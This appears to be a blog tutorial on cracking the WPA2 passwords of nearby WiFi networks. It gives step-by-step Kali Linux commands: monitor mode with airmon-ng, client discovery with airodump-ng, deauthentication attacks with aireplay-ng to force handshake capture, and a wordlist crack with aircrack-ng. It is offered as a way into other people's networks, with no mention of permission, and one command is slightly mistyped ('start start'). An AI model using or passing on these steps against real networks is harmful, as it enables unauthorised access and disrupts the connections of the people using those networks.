Today, we will understand how to hack nearby wifi passwords.
Prerequisites:
- WiFi should be in range (Of course)
- Kali Linux OS (preferred)
- Wifi interface(Already present if using laptop)
The tool of kali linux which we'll be using are:
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
. Let's check out the full steps how to get the password of reachable wifi.
Steps to reproduce:
- Go to console & type the following command:
ifconfig
- Kill all the current processed & network managers related to wifi interface.
airmon-ng check kill
- Start the interface using airmon
airmon-ng start start YOUR_WIFI_INTERFACE_NAME
airmon-ng start start wlan0
- To view all the wifi networks around you.
airodump-ng YOUR_INTERFACE_NAME
airodump-ng wlan0mon
airodump-ng is for capturing the packets
After sometime, click on CTRL+C to stop scanning so that we've some wifi networks.
Now, we need to view the clients connected to that network
airodump-ng -c 1 --bssid BSSID_NUMBER/MAC_ADDRESS -w /root YOUR_WIFI_INTERFACE_NAME
airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
; -c is for channel number, -w is for the directory you want to save the report file
Now, our approach will be disconnecting all the connected clients from the network and sniff the packets received while connecting back to the same network. When it does so, you'll get something we call WPA handshake in current window.
- Open new terminal and disconnect the clients from that network using below code:
aireplay-ng -0 10 -a BSSID_NUMBER/MAC_ADDRESS YOUR_WIFI_INTERFACE_NAME
aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
; aireplay-ng is for injecting the required frames to disconnect clients,
-0 for deauthentication(so that clients will retry to connect),
10 for the deauthentication packets to be send, you can increase or decrease depending upon the time you want to spend on this.
You can now close this window. Capturing the password is now completed from our end. Now, we only need to decrypt the password. To open the passwords file, navigate to the directory you've provided in Step 6 above. You'll get a .cap file. That's our file.
For decrypting the .cap file, we've different techniques. We'll use simple technique using aircrack-ng only. It'll help us crack the password using a wordlist. You can use rockyou.txt wordlist which is most commonly used & is updated on regular basis.
Following is the code to run:
aircrack-ng -a2 -b BSSID_NUMBER/MAC_ADDRESS -w WORDLIST_FILE_LOCATION CAP_FILE_LOCATION
aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
; aircrack-ng is WEP/WPA-PSK key cracking program,
-a2 for WPA2 & -a for WPA network,
-w is the wordlist file location,
If password is successfully cracked, you'll get the confirmation message as "KEY FOUND!"
I've tried to teach how to crack wifi password of your nearby wifi network for free in the simplest manner possible. However, if you're facing any difficulty, do mention it in the comment. Will try to help.
You can follow me on LinkedIn, Instagram or check my latest projects on my GitHub. Also, you can check my portfolio too.
[Keep Hacking] [Thanks]
